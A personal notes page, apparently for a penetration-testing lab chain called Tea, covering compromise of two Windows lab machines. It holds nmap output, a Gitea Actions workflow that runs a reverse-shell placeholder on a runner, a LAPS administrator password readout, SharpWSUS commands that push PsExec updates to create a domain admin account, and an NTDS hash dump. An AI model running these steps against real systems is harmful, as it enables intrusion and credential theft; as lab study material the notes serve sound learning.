Intrusionz3r0-VaultGithubLinkedlnHackthebox

Tea (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username
Password
Method
Scope

✅ Valid Usernames

🔑 Passwords list

Information Gathering

Nmap

Nmap scan report for 10.10.187.181
PORT     STATE SERVICE    REASON          VERSION
53/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
593/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Nmap scan report for 10.10.187.182
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Service Enumeration

10.10.187.181

DNS

  • Not vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

  • Domain SID: S-1-5-21-4071478895-3826761629-2568933575

  • Domain: tea.vl

  • FQDN: DC.tea.vl

  • Server allows null session authentication

  • Parent Domain

  • signing: True (Not vulnerable to NTLM Relay)

10.10.187.182

HTTP:80 (Simple IIS Default Web Site)

HTTP:3000 Gitea

Compromising SRV Server

Signing up a gitea account

Discovering a Runner into the gitea instance

Useful doc: hacking-on-gitea-actions

Exploiting Gitea via Runners

Requirements:

  1. Create a new repository

  2. Enable Repository Actions

  3. Upload the next file: .gitea/workflows/filename.yaml 

name: Gitea Actions Demo
run-name: Hacking via Gitea Actions 🚀
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: <hoaxshell>

Reading LAPS credentials

During the enumeration the tester found a files that indicate the presence of LAPS into the system.

PS C:\Temp > Get-LapsADPassword -Identity srv -AsPlainText
ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : ze4X81s3@GEm%3
PasswordUpdateTime  : 4/23/2025 9:22:32 PM
ExpirationTimestamp : 5/23/2025 9:22:32 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

Compromising Domain Controller DC.TEA.VL

Inspecting the WSUS into the computer

Tool: SharpWSUS (Recommended Version)

C:\Users\Administrator\Desktop>.\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server
C:\WSUS-Updates\WsusContent

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.tea.vl, 10.10.170.85, 10.0.20348.2031, 4/24/2025 6:18:30 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete


C:\Users\Administrator\Desktop>

Abusing Windows Server Update Services (WSUS) 

C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \" net user Intrusionz3r0 P@assword123 /add \"" /title:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \"net localgroup administrators Intrusionz3r0 /add \"" /title:"Adding to Admin"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Adding to Admin"

Dumping Administrator NT hash

 nxc smb 10.10.170.85 -u 'Intrusionz3r0' -p 'P@assword123'  --ntds --user Administrator
SMB         10.10.170.85    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.170.85    445    DC               [+] tea.vl\Intrusionz3r0:P@assword123 (Pwn3d!)
SMB         10.10.170.85    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.170.85    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:c98bef04d073b4607daee561364ff612:::
PreviousReflection (Chain)NextHeron (Chain)

Last updated